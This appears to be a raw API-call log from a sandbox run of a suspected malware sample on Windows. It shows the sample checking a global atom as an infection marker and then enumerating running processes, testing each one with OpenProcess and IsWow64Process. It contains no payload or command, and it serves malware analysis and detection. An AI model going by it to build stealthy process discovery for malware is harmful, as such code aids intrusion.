	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetLastError () returned 0x5
	[0097.081] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.082] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.082] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.082] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.082] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.082] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.082] CloseHandle (hObject=0x248) returned 1
	[0097.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0097.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.083] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.083] CloseHandle (hObject=0x248) returned 1
	[0097.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ae08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.083] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.083] CloseHandle (hObject=0x248) returned 1
	[0097.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16728) returned 0xc0000004
	[0097.156] VirtualAlloc (lpAddress=0x0, dwSize=0x16828, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0097.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16828, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0097.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0097.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0097.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0097.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0097.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0097.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0097.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0097.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0097.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0097.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0097.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0097.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0097.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0097.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0097.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0097.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0097.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0097.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0097.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0097.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0097.161] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.161] CloseHandle (hObject=0x248) returned 1
	[0097.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0097.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0097.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658f68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0097.162] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.162] CloseHandle (hObject=0x248) returned 1
	[0097.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0097.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0097.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0097.163] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.163] CloseHandle (hObject=0x248) returned 1
	[0097.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0097.163] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.163] CloseHandle (hObject=0x248) returned 1
	[0097.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0097.164] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.164] CloseHandle (hObject=0x248) returned 1
	[0097.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0097.164] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.164] CloseHandle (hObject=0x248) returned 1
	[0097.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x6590a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0097.164] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.164] CloseHandle (hObject=0x248) returned 1
	[0097.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0097.165] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.165] CloseHandle (hObject=0x248) returned 1
	[0097.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0097.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0097.165] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.165] CloseHandle (hObject=0x248) returned 1
	[0097.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0097.165] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.165] CloseHandle (hObject=0x248) returned 1
	[0097.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0097.166] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.166] CloseHandle (hObject=0x248) returned 1
	[0097.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658f08, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0097.166] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.166] CloseHandle (hObject=0x248) returned 1
	[0097.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x658dc8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0097.166] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.166] CloseHandle (hObject=0x248) returned 1
	[0097.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0097.167] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.167] CloseHandle (hObject=0x248) returned 1
	[0097.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x6590e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0097.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0097.167] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.167] CloseHandle (hObject=0x248) returned 1
	[0097.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658cb8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0097.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0097.167] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.167] CloseHandle (hObject=0x248) returned 1
	[0097.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658d88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0097.168] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.168] CloseHandle (hObject=0x248) returned 1
	[0097.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.168] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.168] CloseHandle (hObject=0x248) returned 1
	[0097.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.168] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.168] CloseHandle (hObject=0x248) returned 1
	[0097.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x6590e8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.168] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.169] CloseHandle (hObject=0x248) returned 1
	[0097.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658f88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.169] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.169] CloseHandle (hObject=0x248) returned 1
	[0097.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.169] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.169] CloseHandle (hObject=0x248) returned 1
	[0097.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.169] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.170] CloseHandle (hObject=0x248) returned 1
	[0097.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.170] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.170] CloseHandle (hObject=0x248) returned 1
	[0097.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.170] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.170] CloseHandle (hObject=0x248) returned 1
	[0097.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.170] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.170] CloseHandle (hObject=0x248) returned 1
	[0097.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658f48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.171] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.171] CloseHandle (hObject=0x248) returned 1
